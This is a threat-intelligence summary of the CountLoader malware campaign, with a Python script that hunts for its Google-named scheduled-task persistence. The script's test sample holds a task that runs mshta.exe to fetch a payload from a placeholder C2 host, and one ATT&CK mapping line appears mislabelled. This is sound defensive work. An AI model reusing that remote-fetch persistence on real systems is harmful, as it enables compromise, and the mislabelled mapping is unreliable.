Full Report
Cybersecurity researchers have disclosed details of a new campaign that has used cracked software distribution sites as a distribution vector for a new version of a modular and stealthy loader known as CountLoader. The campaign "uses CountLoader as the initial tool in a multistage attack for access, evasion, and delivery of additional malware families," Cyderes Howler Cell Threat Intelligence
Analysis Summary
# Tool/Technique: CountLoader (Version 3.2)
## Overview
CountLoader is a modular and stealthy malware loader, recently observed in a new campaign utilizing cracked software distribution sites and YouTube videos as initial access vectors. Its primary purpose is to serve as the initial stage in a multistage attack chain, facilitating access, maintaining evasion, and delivering subsequent malware families, such as Cobalt Strike, AdaptixC2, PureHVNC RAT, Amatera Stealer, and the reported final-stage ACR Stealer.
## Technical Details
- Type: Malware family (Loader)
- Platform: Windows
- Capabilities: Modular execution, persistence establishment, host profiling, malware delivery (via executable, ZIP, DLL, MSI), defense evasion, and self-propagation via USB drives.
- First Seen: Detected in the wild since at least June 2025.
## MITRE ATT&CK Mapping
- TA0001 - Initial Access
- T1192 - Drive-by Compromise (via distribution sites)
- TA0003 - Persistence
- T1547.001 - Registry Run Keys / Startup Folder (Likely related to persistence mechanism)
- T1053.005 - Scheduled Task/Job
- TA0005 - Defense Evasion
- T1027 - Obfuscated Files or Information (Encrypted ZIP, context-dependent execution)
- T1564.003 - Hidden Window (Implied by stealthy nature and use of `mshta.exe`)
- TA0011 - Command and Control
- T1071.001 - Application Layer Protocol: Web Protocols (Use of `mshta.exe` to reach C2)
- TA0002 - Execution
- T1204.002 - User Execution: Malicious File (User downloading and executing cracked software)
- T1218 - Signed Binary Proxy Execution (`mshta.exe`, `rundll32.exe`, `cmd.exe`)
## Functionality
### Core Capabilities
* **Initial Execution via Python Interpreter:** Deployed via a renamed legitimate Python interpreter ("Setup.exe") within archives downloaded from cracked software sites.
* **Remote Payload Retrieval:** Uses `mshta.exe` to retrieve the main CountLoader component from a remote server.
* **Multi-Stage Delivery:** Capable of downloading and executing various subsequent payloads, including executables, ZIP archives containing Python modules or EXEs, DLLs executed via `rundll32.exe`, or MSI installers.
* **Host Profiling:** Collects and exfiltrates extensive system information about the compromised host.
### Advanced Features
* **Evasion via Security Check:** Checks for the presence of CrowdStrike Falcon security software via WMI and alters its persistence command if detected.
* **Stealthy Persistence:** Establishes persistence using a scheduled task named to mimic Google ("GoogleTaskSystem136.0.7023.12"), set to run every 30 minutes for 10 years via `mshta.exe`.
* **Fileless Execution:** Supports executing a remote PowerShell payload directly in memory.
* **USB Propagation:** Capability to spread to other hosts via removable USB drives by creating malicious LNK files adjacent to original files, which execute the malware upon launch.
* **Signed Binary Abuse:** Heavily relies on signed binaries like `mshta.exe` and PowerShell for execution and C2 communication.
## Indicators of Compromise
*Note: Specific hashes, IPs, and domains were not mentioned in the text and must be derived from active analysis or external context.*
- File Hashes: [Not specified in the article]
- File Names: "Setup.exe" (renamed Python interpreter), Malicious ZIP archives, encrypted ZIP file, MS Word document.
- Registry Keys / Scheduled Tasks: A scheduled task named "GoogleTaskSystem136.0.7023.12" (no specific registry key is given in the article).
- Network Indicators: Fallback domains and C2 servers used by `mshta.exe` to fetch payloads (defanged: example connection to `hxxp://c2-server-name[.]com`).
- Behavioral Indicators: Execution chain involving file extraction, modification of a scheduled task to run every 30 minutes for a decade, WMI query to check for CrowdStrike, and subsequent execution of `mshta.exe` or PowerShell.
## Associated Threat Actors
- The campaign is associated with the deployment of **ACR Stealer** as a final payload.
- The broader context suggests an association with threat groups that use loaders such as CountLoader, which earlier reporting has linked to Russian ransomware operations.
## Detection Methods
- Signature-based detection: Signatures targeting the specific dropped filenames or the known structure of the CountLoader payload.
- Behavioral detection: Monitoring the creation of scheduled tasks with very long repetition windows (10 years) or suspicious names (e.g., mimicking legitimate services). Detection of WMI queries that enumerate installed security products or antivirus processes.
- YARA rules: Rules targeting unique strings or compilation artifacts within the CountLoader binary or its derived first-stage components.
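The behavioral indicators above (a Google-branded scheduled task that repeats every 30 minutes for a decade and launches `mshta.exe` against a remote URL) can be hunted in exported Task Scheduler XML, which is what `schtasks /query /xml` or `Export-ScheduledTask` produce. The script below is an added example written for this summary, not code from the report or from Cyderes; the two task definitions it scans are constructed (the C2 hostname is a placeholder under `.example`), and the "Google name without a Google binary" heuristic, the one-year repetition threshold and the proxy-binary list are the example's own assumptions.

```python
"""Hunt for CountLoader-style scheduled-task persistence in Task Scheduler XML.

Added example (not from the report). The two task definitions below are
constructed to mirror the described behaviour and a benign look-alike.
"""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Signed Windows binaries routinely abused as script/payload proxies (T1218).
PROXY_BINARIES = {"mshta.exe", "rundll32.exe", "powershell.exe", "cmd.exe",
                  "wscript.exe", "cscript.exe"}
ONE_YEAR_MINUTES = 365 * 24 * 60
DUR_RE = re.compile(
    r"P(?:(\d+)Y)?(?:(\d+)M)?(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?")


def iso_duration_minutes(value):
    """ISO 8601 duration as used in task XML (e.g. PT30M, P3650D) -> minutes.
    Years/months are approximated as 365/30 days; unparsable input -> 0."""
    m = DUR_RE.fullmatch(value or "")
    if not m:
        return 0
    y, mo, d, h, mi, s = (int(g) if g else 0 for g in m.groups())
    return ((y * 365 + mo * 30 + d) * 24 + h) * 60 + mi + s // 60


def _basename(command):
    """Strip quotes and path from an <Exec><Command> value."""
    return command.strip().strip('"').replace("\\", "/").rsplit("/", 1)[-1].lower()


def analyze_task(xml_text):
    """Return a list of human-readable findings for one task definition."""
    root = ET.fromstring(xml_text)
    findings = []
    uri = root.findtext("t:RegistrationInfo/t:URI", default="", namespaces=NS)
    commands = []
    for ex in root.findall("t:Actions/t:Exec", NS):
        cmd = ex.findtext("t:Command", default="", namespaces=NS)
        args = ex.findtext("t:Arguments", default="", namespaces=NS)
        commands.append(cmd)
        exe = _basename(cmd)
        if exe in PROXY_BINARIES:
            findings.append(f"action runs signed proxy binary {exe}")
        # Also matches defanged hxxp:// so exported IoC lists can be scanned.
        if re.search(r"\bh(?:xx|tt)ps?://", args, re.I):
            findings.append("action arguments contain a URL (remote payload fetch)")
    for rep in root.findall(".//t:Repetition", NS):
        interval = iso_duration_minutes(rep.findtext("t:Interval", default="", namespaces=NS))
        duration = iso_duration_minutes(rep.findtext("t:Duration", default="", namespaces=NS))
        if duration >= ONE_YEAR_MINUTES:
            findings.append(
                f"repeats every {interval} minutes for {duration // 1440} days (>= 1 year)")
    # Heuristic (assumption): a Google-branded task whose action is not a Google binary.
    if "google" in uri.lower() and not any("google" in c.lower() for c in commands):
        findings.append("task name impersonates Google but no action runs a Google binary")
    return findings


# Constructed sample: mirrors the persistence described in the report.
SUSPICIOUS_TASK_XML = r"""<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\GoogleTaskSystem136.0.7023.12</URI></RegistrationInfo>
  <Triggers><TimeTrigger>
    <Repetition><Interval>PT30M</Interval><Duration>P3650D</Duration></Repetition>
    <StartBoundary>2025-06-01T00:00:00</StartBoundary><Enabled>true</Enabled>
  </TimeTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>mshta.exe</Command>
    <Arguments>http://c2-server-name.example/stage</Arguments>
  </Exec></Actions>
</Task>"""

# Constructed sample: a benign-looking Google Update task for comparison.
BENIGN_TASK_XML = r"""<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\GoogleUpdateTaskMachineUA</URI></RegistrationInfo>
  <Triggers><TimeTrigger>
    <Repetition><Interval>PT1H</Interval><Duration>P1D</Duration></Repetition>
    <StartBoundary>2025-06-01T00:00:00</StartBoundary><Enabled>true</Enabled>
  </TimeTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>C:\Program Files (x86)\Google\Update\GoogleUpdate.exe</Command>
    <Arguments>/ua /installsource scheduler</Arguments>
  </Exec></Actions>
</Task>"""

if __name__ == "__main__":
    for name, xml_text in (("suspicious", SUSPICIOUS_TASK_XML), ("benign", BENIGN_TASK_XML)):
        print(name, analyze_task(xml_text) or ["no findings"])
```

In practice each exported task definition is fed to `analyze_task`, and a task that accumulates several findings (proxy binary plus remote URL plus multi-year repetition) is the combination worth escalating; any single finding on its own, such as a long repetition window, is common in legitimate maintenance tasks.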
## Mitigation Strategies
- Prevention measures: Block access to known malicious file-sharing or cracked software distribution websites. Filter or sandbox execution from high-risk file types like ZIP archives containing executables.
- Hardening recommendations: Implement application control solutions to restrict the execution of scripts via utilities like `mshta.exe` or PowerShell unless necessary for approved applications. Disable execution of scripts from removable media. Employ robust EDR solutions capable of detecting signed binary proxy execution chains and WMI-based reconnaissance.
## Related Tools/Techniques
- GachiLoader: Another malware loader mentioned in the article, distributed via a separate "YouTube Ghost Network" and written in Node.js.
- ACR Stealer: The final-stage information stealer delivered by this CountLoader campaign.
- Previous CountLoader Operations: Previous variants distributed malware like Cobalt Strike, AdaptixC2, PureHVNC RAT, Amatera Stealer, and PureMiner.